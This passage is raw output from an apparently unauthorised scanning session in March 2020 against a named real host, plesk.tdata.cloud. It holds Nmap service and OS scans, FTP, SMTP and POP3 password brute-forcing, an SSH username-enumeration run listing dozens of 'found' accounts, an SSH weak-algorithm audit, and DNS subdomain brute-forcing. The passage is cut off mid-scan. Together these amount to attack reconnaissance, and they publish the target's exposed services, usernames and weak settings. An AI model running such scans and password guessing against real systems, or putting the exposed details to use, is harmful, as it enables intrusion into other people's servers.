5286SF:ibrary/plesk-ui-library\.min\.js\?3\.5\.0\"></script>\n\x20\x20\x20\x20
5287SF:<script\x20type=\"text/javascript\"\x20src=\"/cp/javascript/vendors\.js
5288SF:\"></script>\n\x20\x20\x20\x20<script\x20type=\"text/javascript\"\x20sr
5289SF:c=\"/cp/javascript/main\.js\"></script>\n\x20\x20\x20\x20<script\x20typ
5290SF:e=\"text/javascript\"\x20src=\"/error_docs/uat\.js\?v1\"></script>\n<li
5291SF:nk\x20href=\"/error_docs/app\.css\"\x20rel=\"stylesheet\"></head>\n<bod
5292SF:y>\n<div\x20id=\"app\"><");
5293Aggressive OS guesses: Linux 3.10 - 4.11 (94%), Linux 3.2 - 4.9 (90%), Linux 3.13 (90%), Linux 3.13 or 4.2 (90%), Linux 4.1 (90%), Linux 4.10 (90%), Linux 4.2 (90%), Linux 4.4 (90%), Asus RT-AC66U WAP (90%), Linux 3.10 (89%)
5294No exact OS matches for host (test conditions non-ideal).
5295Network Distance: 19 hops
5296Service Info: Host: plesk.tdata.cloud
5297
5298TRACEROUTE (using port 995/tcp)
5299HOP RTT ADDRESS
53001 290.61 ms 10.202.5.1
53012 290.64 ms unn-84-17-52-126.cdn77.com (84.17.52.126)
53023 290.64 ms hu0-1-0-2.rcr51.b021037-0.zrh02.atlas.cogentco.com (149.11.89.129)
53034 290.65 ms be3591.ccr51.zrh02.atlas.cogentco.com (130.117.50.182)
53045 290.66 ms be3072.ccr21.muc03.atlas.cogentco.com (130.117.0.18)
53056 290.68 ms be2959.ccr41.fra03.atlas.cogentco.com (154.54.36.53)
53067 290.68 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2)
53078 290.68 ms telefonica.fra03.atlas.cogentco.com (130.117.14.118)
53089 290.71 ms 176.52.248.119
530910 ...
531011 578.78 ms 176.52.248.54
531112 456.31 ms 5.53.7.171
531213 ... 14
531315 578.74 ms pe24tolp01.Vl466.lflo.internacional.ce.nap.movistar.cl (186.148.62.118)
531416 ... 18
531519 578.68 ms plesk.tdata.cloud (200.54.230.247)
5316#####################################################################################################################################
5317Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-12 16:38 EDT
5318Warning: 200.54.230.247 giving up on port because retransmission cap hit (2).
5319Nmap scan report for plesk.tdata.cloud (200.54.230.247)
5320Host is up (0.30s latency).
5321Not shown: 16 filtered ports
5322Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
5323PORT STATE SERVICE VERSION
532453/tcp open domain (unknown banner: none)
5325| fingerprint-strings:
5326| DNSVersionBindReqTCP:
5327| version
5328| bind
5329|_ none
533053/udp open domain (unknown banner: none)
5331| dns-nsid:
5332|_ bind.version: none
5333| fingerprint-strings:
5334| DNSVersionBindReq:
5335| version
5336| bind
5337| none
5338| NBTStat:
5339|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
534067/udp open|filtered dhcps
534168/udp open|filtered dhcpc
5342123/udp open|filtered ntp
5343137/udp open|filtered netbios-ns
5344138/udp open|filtered netbios-dgm
5345161/udp open|filtered snmp
5346162/udp open|filtered snmptrap
5347389/udp open|filtered ldap
5348520/udp open|filtered route
53492049/udp open|filtered nfs
53502 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
5351==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
5352SF-Port53-TCP:V=7.80%I=7%D=3/12%Time=5E6A9DE0%P=x86_64-pc-linux-gnu%r(DNSV
5353SF:ersionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
5354SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c\
5355SF:0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
5356==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
5357SF-Port53-UDP:V=7.80%I=7%D=3/12%Time=5E6A9DDA%P=x86_64-pc-linux-gnu%r(DNSV
5358SF:ersionBindReq,3D,"\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x04bind
5359SF:\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c\0\x02\
5360SF:0\x03\0\0\0\0\0\x02\xc0\x0c")%r(DNSStatusRequest,C,"\0\0\x90\x04\0\0\0\
5361SF:0\0\0\0\0")%r(NBTStat,32,"\x80\xf0\x80\x15\0\x01\0\0\0\0\0\0\x20CKAAAAA
5362SF:AAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01");
5363Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
5364Aggressive OS guesses: Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%), Linux 3.18 (90%), Crestron XPanel control system (89%), Linux 3.16 (88%), HP P2000 G3 NAS device (86%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.2 (86%), Oracle VM Server 3.4.2 (Linux 4.1) (86%)
5365No exact OS matches for host (test conditions non-ideal).
5366Network Distance: 19 hops
5367
5368TRACEROUTE (using port 53/tcp)
5369HOP RTT ADDRESS
53701 268.71 ms 10.202.5.1
53712 268.73 ms unn-84-17-52-126.cdn77.com (84.17.52.126)
53723 268.76 ms hu0-1-0-2.rcr51.b021037-0.zrh02.atlas.cogentco.com (149.11.89.129)
53734 268.78 ms be3592.ccr52.zrh02.atlas.cogentco.com (154.54.37.150)
53745 268.81 ms be3073.ccr22.muc03.atlas.cogentco.com (130.117.0.62)
53756 268.87 ms be2960.ccr42.fra03.atlas.cogentco.com (154.54.36.253)
53767 268.86 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2)
53778 268.85 ms telefonica.fra03.atlas.cogentco.com (130.117.14.118)
53789 268.91 ms 176.52.248.217
537910 ...
538011 502.64 ms 94.142.97.64
538112 502.67 ms 5.53.0.215
538213 ... 14
538315 502.59 ms pe24tolp01.Vl466.lflo.internacional.ce.nap.movistar.cl (186.148.62.118)
538416 ... 18
538519 502.56 ms plesk.tdata.cloud (200.54.230.247)
5386####################################################################################################################################
5387Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-12 16:39 EDT
5388NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
5389NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
5390NSE: [ftp-brute] passwords: Time limit 3m00s exceeded.
5391Nmap scan report for plesk.tdata.cloud (200.54.230.247)
5392Host is up (0.30s latency).
5393
5394PORT STATE SERVICE VERSION
539521/tcp open ftp ProFTPD
5396| ftp-brute:
5397| Accounts: No valid accounts found
5398|_ Statistics: Performed 1791 guesses in 181 seconds, average tps: 9.6
5399Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
5400Aggressive OS guesses: Linux 3.10 - 4.11 (91%), Linux 3.18 (91%), Linux 3.2 - 4.9 (91%), Crestron XPanel control system (89%), Linux 3.16 (88%), HP P2000 G3 NAS device (86%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.2 (86%), Oracle VM Server 3.4.2 (Linux 4.1) (86%)
5401No exact OS matches for host (test conditions non-ideal).
5402Network Distance: 20 hops
5403
5404TRACEROUTE (using port 21/tcp)
5405HOP RTT ADDRESS
54061 222.98 ms 10.202.5.1
54072 336.73 ms unn-84-17-52-126.cdn77.com (84.17.52.126)
54083 336.78 ms hu0-1-0-2.rcr51.b021037-0.zrh02.atlas.cogentco.com (149.11.89.129)
54094 336.80 ms be3591.ccr51.zrh02.atlas.cogentco.com (130.117.50.182)
54105 336.83 ms be3072.ccr21.muc03.atlas.cogentco.com (130.117.0.18)
54116 336.87 ms be2959.ccr41.fra03.atlas.cogentco.com (154.54.36.53)
54127 336.90 ms be3187.agr41.fra03.atlas.cogentco.com (130.117.1.117)
54138 336.87 ms telefonica.fra03.atlas.cogentco.com (130.117.14.118)
54149 336.95 ms 176.52.248.230
541510 336.98 ms 94.142.127.138
541611 503.90 ms 94.142.98.130
541712 392.57 ms 176.52.252.223
541813 ...
541914 392.49 ms nap96lflo02.lo0.red.lflo.nap.movistar.cl (200.91.0.6)
542015 392.45 ms nap96lflo02.lo0.red.lflo.nap.movistar.cl (200.91.0.6)
542116 392.45 ms pe24tolp01.Vl466.lflo.internacional.ce.nap.movistar.cl (186.148.62.118)
542217 ... 19
542320 392.45 ms plesk.tdata.cloud (200.54.230.247)
5424####################################################################################################################################
5425# general
5426(gen) banner: SSH-2.0-OpenSSH_7.4
5427(gen) software: OpenSSH 7.4
5428(gen) compatibility: OpenSSH 7.3+ (some functionality from 6.6), Dropbear SSH 2016.73+ (some functionality from 0.52)
5429(gen) compression: enabled (zlib@openssh.com)
5430
5431# key exchange algorithms
5432(kex) curve25519-sha256 -- [warn] unknown algorithm
5433(kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
5434(kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
5435 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
5436(kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
5437 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
5438(kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
5439 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
5440(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
5441 `- [info] available since OpenSSH 4.4
5442(kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
5443(kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3
5444(kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
5445 `- [warn] using weak hashing algorithm
5446 `- [info] available since OpenSSH 2.3.0
5447(kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
5448(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
5449 `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
5450(kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
5451 `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
5452 `- [warn] using small 1024-bit modulus
5453 `- [warn] using weak hashing algorithm
5454 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
5455
5456# host-key algorithms
5457(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
5458(key) rsa-sha2-512 -- [info] available since OpenSSH 7.2
5459(key) rsa-sha2-256 -- [info] available since OpenSSH 7.2
5460(key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
5461 `- [warn] using weak random number generator could reveal the key
5462 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
5463(key) ssh-ed25519 -- [info] available since OpenSSH 6.5
5464
5465# encryption algorithms (ciphers)
5466(enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
5467 `- [info] default cipher since OpenSSH 6.9.
5468(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
5469(enc) aes192-ctr -- [info] available since OpenSSH 3.7
5470(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
5471(enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
5472(enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
5473(enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
5474 `- [warn] using weak cipher mode
5475 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
5476(enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
5477 `- [warn] using weak cipher mode
5478 `- [info] available since OpenSSH 2.3.0
5479(enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
5480 `- [warn] using weak cipher mode
5481 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
5482(enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
5483 `- [fail] disabled since Dropbear SSH 0.53
5484 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
5485 `- [warn] using weak cipher mode
5486 `- [warn] using small 64-bit block size
5487 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
5488(enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
5489 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
5490 `- [warn] using weak cipher mode
5491 `- [warn] using small 64-bit block size
5492 `- [info] available since OpenSSH 2.1.0
5493(enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
5494 `- [warn] using weak cipher
5495 `- [warn] using weak cipher mode
5496 `- [warn] using small 64-bit block size
5497 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
5498
5499# message authentication code algorithms
5500(mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
5501 `- [info] available since OpenSSH 6.2
5502(mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
5503(mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
5504(mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
5505(mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
5506 `- [info] available since OpenSSH 6.2
5507(mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
5508 `- [warn] using small 64-bit tag size
5509 `- [info] available since OpenSSH 4.7
5510(mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
5511 `- [info] available since OpenSSH 6.2
5512(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
5513 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
5514(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
5515 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
5516(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
5517 `- [warn] using weak hashing algorithm
5518 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
5519
5520# algorithm recommendations (for OpenSSH 7.4)
5521(rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
5522(rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
5523(rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove
5524(rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
5525(rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
5526(rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
5527(rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
5528(rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
5529(rec) -blowfish-cbc -- enc algorithm to remove
5530(rec) -3des-cbc -- enc algorithm to remove
5531(rec) -aes256-cbc -- enc algorithm to remove
5532(rec) -cast128-cbc -- enc algorithm to remove
5533(rec) -aes192-cbc -- enc algorithm to remove
5534(rec) -aes128-cbc -- enc algorithm to remove
5535(rec) -hmac-sha2-512 -- mac algorithm to remove
5536(rec) -umac-128@openssh.com -- mac algorithm to remove
5537(rec) -hmac-sha2-256 -- mac algorithm to remove
5538(rec) -umac-64@openssh.com -- mac algorithm to remove
5539(rec) -hmac-sha1 -- mac algorithm to remove
5540(rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
5541(rec) -umac-64-etm@openssh.com -- mac algorithm to remove
5542#####################################################################################################################################
5543Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-12 16:43 EDT
5544Nmap scan report for plesk.tdata.cloud (200.54.230.247)
5545Host is up (0.19s latency).
5546
5547PORT STATE SERVICE VERSION
554822/tcp filtered ssh
5549Too many fingerprints match this host to give specific OS details
5550Network Distance: 19 hops
5551
5552TRACEROUTE (using proto 1/icmp)
5553HOP RTT ADDRESS
55541 288.98 ms 10.202.5.1
55552 289.03 ms unn-84-17-52-126.cdn77.com (84.17.52.126)
55563 289.01 ms hu0-1-0-2.rcr51.b021037-0.zrh02.atlas.cogentco.com (149.11.89.129)
55574 289.03 ms be3592.ccr52.zrh02.atlas.cogentco.com (154.54.37.150)
55585 289.05 ms be3073.ccr22.muc03.atlas.cogentco.com (130.117.0.62)
55596 289.12 ms be2960.ccr42.fra03.atlas.cogentco.com (154.54.36.253)
55607 289.13 ms be3187.agr41.fra03.atlas.cogentco.com (130.117.1.117)
55618 289.12 ms telefonica.fra03.atlas.cogentco.com (130.117.14.118)
55629 299.92 ms 176.52.248.119
556310 345.38 ms 94.142.97.121
556411 466.19 ms 94.142.97.64
556512 466.19 ms 5.53.0.213
556613 ...
556714 466.20 ms pe24tolp01.Vl466.lflo.internacional.pe.nap.movistar.cl (186.148.62.117)
556815 466.21 ms pe24tolp01.Vl466.lflo.internacional.ce.nap.movistar.cl (186.148.62.118)
556916 ... 18
557019 569.64 ms plesk.tdata.cloud (200.54.230.247)
5571####################################################################################################################################
5572USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
5573RHOSTS => 200.54.230.247
5574RHOST => 200.54.230.247
5575[*] 200.54.230.247:22 - SSH - Using malformed packet technique
5576[*] 200.54.230.247:22 - SSH - Starting scan
5577[+] 200.54.230.247:22 - SSH - User 'admin' found
5578[+] 200.54.230.247:22 - SSH - User 'administrator' found
5579[+] 200.54.230.247:22 - SSH - User 'anonymous' found
5580[+] 200.54.230.247:22 - SSH - User 'backup' found
5581[+] 200.54.230.247:22 - SSH - User 'bee' found
5582[+] 200.54.230.247:22 - SSH - User 'ftp' found
5583[+] 200.54.230.247:22 - SSH - User 'guest' found
5584[+] 200.54.230.247:22 - SSH - User 'GUEST' found
5585[+] 200.54.230.247:22 - SSH - User 'info' found
5586[+] 200.54.230.247:22 - SSH - User 'mail' found
5587[+] 200.54.230.247:22 - SSH - User 'mailadmin' found
5588[+] 200.54.230.247:22 - SSH - User 'msfadmin' found
5589[+] 200.54.230.247:22 - SSH - User 'mysql' found
5590[+] 200.54.230.247:22 - SSH - User 'nobody' found
5591[+] 200.54.230.247:22 - SSH - User 'oracle' found
5592[+] 200.54.230.247:22 - SSH - User 'owaspbwa' found
5593[+] 200.54.230.247:22 - SSH - User 'postfix' found
5594[+] 200.54.230.247:22 - SSH - User 'postgres' found
5595[+] 200.54.230.247:22 - SSH - User 'private' found
5596[+] 200.54.230.247:22 - SSH - User 'proftpd' found
5597[+] 200.54.230.247:22 - SSH - User 'public' found
5598[+] 200.54.230.247:22 - SSH - User 'root' found
5599[+] 200.54.230.247:22 - SSH - User 'superadmin' found
5600[+] 200.54.230.247:22 - SSH - User 'support' found
5601[+] 200.54.230.247:22 - SSH - User 'sys' found
5602[+] 200.54.230.247:22 - SSH - User 'system' found
5603[+] 200.54.230.247:22 - SSH - User 'systemadmin' found
5604[+] 200.54.230.247:22 - SSH - User 'systemadministrator' found
5605[+] 200.54.230.247:22 - SSH - User 'test' found
5606[+] 200.54.230.247:22 - SSH - User 'tomcat' found
5607[+] 200.54.230.247:22 - SSH - User 'user' found
5608[+] 200.54.230.247:22 - SSH - User 'webmaster' found
5609[+] 200.54.230.247:22 - SSH - User 'www-data' found
5610[+] 200.54.230.247:22 - SSH - User 'Fortimanager_Access' found
5611[*] Scanned 1 of 1 hosts (100% complete)
5612[*] Auxiliary module execution completed
5613####################################################################################################################################
5614Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-12 16:46 EDT
5615NSE: [smtp-brute] usernames: Time limit 3m00s exceeded.
5616NSE: [smtp-brute] usernames: Time limit 3m00s exceeded.
5617NSE: [smtp-brute] passwords: Time limit 3m00s exceeded.
5618Nmap scan report for plesk.tdata.cloud (200.54.230.247)
5619Host is up (0.35s latency).
5620
5621PORT STATE SERVICE VERSION
562225/tcp open smtp Postfix smtpd
5623| smtp-brute:
5624| Accounts: No valid accounts found
5625|_ Statistics: Performed 1182 guesses in 184 seconds, average tps: 7.0
5626|_smtp-commands: plesk.tdata.cloud, PIPELINING, SIZE 42188800, ETRN, STARTTLS, AUTH DIGEST-MD5 CRAM-MD5 PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
5627| smtp-enum-users:
5628|_ root
5629|_smtp-open-relay: Server doesn't seem to be an open relay, all tests failed
5630| smtp-vuln-cve2010-4344:
5631|_ The SMTP server is not Exim: NOT VULNERABLE
5632Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
5633Aggressive OS guesses: Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%), Crestron XPanel control system (89%), Linux 3.18 (88%), Linux 3.16 (88%), HP P2000 G3 NAS device (86%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.2 (86%), Oracle VM Server 3.4.2 (Linux 4.1) (86%)
5634No exact OS matches for host (test conditions non-ideal).
5635Network Distance: 19 hops
5636Service Info: Host: plesk.tdata.cloud
5637
5638TRACEROUTE (using port 25/tcp)
5639HOP RTT ADDRESS
56401 289.37 ms 10.202.5.1
56412 289.41 ms unn-84-17-52-126.cdn77.com (84.17.52.126)
56423 289.46 ms hu0-1-0-2.rcr51.b021037-0.zrh02.atlas.cogentco.com (149.11.89.129)
56434 289.49 ms be3591.ccr51.zrh02.atlas.cogentco.com (130.117.50.182)
56445 289.51 ms be3072.ccr21.muc03.atlas.cogentco.com (130.117.0.18)
56456 289.55 ms be2959.ccr41.fra03.atlas.cogentco.com (154.54.36.53)
56467 325.25 ms be3187.agr41.fra03.atlas.cogentco.com (130.117.1.117)
56478 289.55 ms telefonica.fra03.atlas.cogentco.com (130.117.14.118)
56489 438.46 ms 176.52.248.217
564910 ...
565011 487.20 ms 176.52.248.54
565112 487.07 ms 5.53.0.213
565213 487.11 ms 5.53.0.235
565314 487.08 ms nap96lflo02.lo0.red.lflo.nap.movistar.cl (200.91.0.6)
565415 487.05 ms nap96lflo02.lo0.red.lflo.nap.movistar.cl (200.91.0.6)
565516 ... 18
565619 448.70 ms plesk.tdata.cloud (200.54.230.247)
5657####################################################################################################################################
5658Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-12 16:58 EDT
5659Nmap scan report for plesk.tdata.cloud (200.54.230.247)
5660Host is up (0.32s latency).
5661
5662PORT STATE SERVICE VERSION
566353/tcp open domain (unknown banner: none)
5664|_dns-fuzz: Server didn't response to our probe, can't fuzz
5665| dns-nsec-enum:
5666|_ No NSEC records found
5667| dns-nsec3-enum:
5668|_ DNSSEC NSEC3 not supported
5669| dns-nsid:
5670|_ bind.version: none
5671| fingerprint-strings:
5672| DNSVersionBindReqTCP:
5673| version
5674| bind
5675|_ none
56761 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
5677SF-Port53-TCP:V=7.80%I=7%D=3/12%Time=5E6AA269%P=x86_64-pc-linux-gnu%r(DNSV
5678SF:ersionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
5679SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c\
5680SF:0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
5681Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
5682Aggressive OS guesses: Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%), Crestron XPanel control system (89%), Linux 3.18 (88%), Linux 3.16 (88%), HP P2000 G3 NAS device (86%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.2 (86%), Oracle VM Server 3.4.2 (Linux 4.1) (86%)
5683No exact OS matches for host (test conditions non-ideal).
5684Network Distance: 19 hops
5685
5686Host script results:
5687| dns-blacklist:
5688| SPAM
5689|_ l2.apews.org - SPAM
5690| dns-brute:
5691| DNS Brute-force hostnames:
5692| ns.tdata.cloud - 54.158.225.56
5693| www.tdata.cloud - 54.158.225.56
5694| smtp.tdata.cloud - 200.54.230.253
5695| mail.tdata.cloud - 54.158.225.56
5696|_ ftp.tdata.cloud - 54.158.225.56
5697
5698TRACEROUTE (using port 53/tcp)
5699HOP RTT ADDRESS
57001 258.49 ms 10.202.5.1
57012 258.54 ms unn-84-17-52-126.cdn77.com (84.17.52.126)
57023 258.57 ms hu0-1-0-2.rcr51.b021037-0.zrh02.atlas.cogentco.com (149.11.89.129)
57034 144.24 ms be3592.ccr52.zrh02.atlas.cogentco.com (154.54.37.150)
57045 144.27 ms be3073.ccr22.muc03.atlas.cogentco.com (130.117.0.62)
57056 144.29 ms be2960.ccr42.fra03.atlas.cogentco.com (154.54.36.253)
57067 144.31 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2)
57078 144.33 ms telefonica.fra03.atlas.cogentco.com (130.117.14.118)
57089 258.68 ms 176.52.248.119
570910 258.73 ms 94.142.126.162
571011 450.75 ms 176.52.248.54
571112 450.71 ms 5.53.7.171
571213 ...
571314 564.47 ms nap96lflo02.lo0.red.lflo.nap.movistar.cl (200.91.0.6)
571415 450.62 ms pe24tolp01.Vl466.lflo.internacional.ce.nap.movistar.cl (186.148.62.118)
571516 ... 18
571619 568.84 ms plesk.tdata.cloud (200.54.230.247)
5717#####################################################################################################################################
5718Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-12 16:58 EDT
5719Nmap scan report for plesk.tdata.cloud (200.54.230.247)
5720Host is up (0.43s latency).
5721
5722PORT STATE SERVICE VERSION
572367/tcp filtered dhcps
572467/udp filtered dhcps
5725Too many fingerprints match this host to give specific OS details
5726Network Distance: 20 hops
5727
5728TRACEROUTE (using port 67/udp)
5729HOP RTT ADDRESS
57301 310.07 ms 10.202.5.1
57312 310.11 ms unn-84-17-52-126.cdn77.com (84.17.52.126)
57323 310.12 ms hu0-1-0-2.rcr51.b021037-0.zrh02.atlas.cogentco.com (149.11.89.129)
57334 310.14 ms be3592.ccr52.zrh02.atlas.cogentco.com (154.54.37.150)
57345 310.15 ms be3073.ccr22.muc03.atlas.cogentco.com (130.117.0.62)
57356 310.18 ms be2960.ccr42.fra03.atlas.cogentco.com (154.54.36.253)
57367 310.18 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2)
57378 310.21 ms telefonica.fra03.atlas.cogentco.com (130.117.14.118)
57389 310.23 ms 176.52.248.217
573910 424.06 ms 94.142.97.121
574011 456.02 ms 94.142.122.30
574112 456.00 ms 176.52.253.159
574213 455.98 ms 176.52.252.223
574314 455.95 ms nap96lflo02.lo0.red.lflo.nap.movistar.cl (200.91.0.6)
574415 455.99 ms nap96lflo02.lo0.red.lflo.nap.movistar.cl (200.91.0.6)
574516 ... 19
574620 460.30 ms plesk.tdata.cloud (200.54.230.247)
5747#####################################################################################################################################
5748Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-12 16:59 EDT
5749Nmap scan report for plesk.tdata.cloud (200.54.230.247)
5750Host is up (0.26s latency).
5751
5752PORT STATE SERVICE VERSION
575368/tcp filtered dhcpc
575468/udp open|filtered dhcpc
5755Too many fingerprints match this host to give specific OS details
5756Network Distance: 19 hops
5757
5758TRACEROUTE (using proto 1/icmp)
5759HOP RTT ADDRESS
57601 276.54 ms 10.202.5.1
57612 276.59 ms unn-84-17-52-126.cdn77.com (84.17.52.126)
57623 276.62 ms hu0-1-0-2.rcr51.b021037-0.zrh02.atlas.cogentco.com (149.11.89.129)
57634 276.65 ms be3592.ccr52.zrh02.atlas.cogentco.com (154.54.37.150)
57645 276.67 ms be3073.ccr22.muc03.atlas.cogentco.com (130.117.0.62)
57656 276.76 ms be2960.ccr42.fra03.atlas.cogentco.com (154.54.36.253)
57667 276.79 ms be3187.agr41.fra03.atlas.cogentco.com (130.117.1.117)
57678 276.81 ms telefonica.fra03.atlas.cogentco.com (130.117.14.118)
57689 332.41 ms 176.52.248.119
576910 446.99 ms 94.142.97.121
577011 499.21 ms 94.142.97.64
577112 499.05 ms 5.53.0.213
577213 ...
577314 499.08 ms pe24tolp01.Vl466.lflo.internacional.pe.nap.movistar.cl (186.148.62.117)
577415 499.11 ms pe24tolp01.Vl466.lflo.internacional.ce.nap.movistar.cl (186.148.62.118)
577516 ... 18
577619 562.14 ms plesk.tdata.cloud (200.54.230.247)
5777#####################################################################################################################################
5778
5779wig - WebApp Information Gatherer
5780
5781
5782Scanning http://200.54.230.247...
5783_________________________________________ SITE INFO _________________________________________
5784IP Title
5785200.54.230.247 Web Server's Default Page
5786
5787__________________________________________ VERSION __________________________________________
5788Name Versions Type
5789Apache 2.4.10 | 2.4.11 | 2.4.12 | 2.4.5 | 2.4.6 | 2.4.7 | 2.4.8 Platform
5790 2.4.9
5791nginx Platform
5792
5793_____________________________________________________________________________________________
5794Time: 93.5 sec Urls: 817 Fingerprints: 40401
5795####################################################################################################################################
5796HTTP/1.1 200 OK
5797Server: nginx
5798Date: Thu, 12 Mar 2020 21:00:55 GMT
5799Content-Type: text/html
5800Content-Length: 4839
5801Connection: keep-alive
5802Last-Modified: Tue, 25 Feb 2020 23:24:31 GMT
5803ETag: "12e7-59f6eca3b2f55"
5804Accept-Ranges: bytes
5805
5806HTTP/1.1 200 OK
5807Server: nginx
5808Date: Thu, 12 Mar 2020 21:00:56 GMT
5809Content-Type: text/html
5810Content-Length: 4839
5811Connection: keep-alive
5812Last-Modified: Tue, 25 Feb 2020 23:24:31 GMT
5813ETag: "12e7-59f6eca3b2f55"
5814Accept-Ranges: bytes
5815#####################################################################################################################################
5816Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-12 17:01 EDT
5817NSE: [pop3-brute] usernames: Time limit 3m00s exceeded.
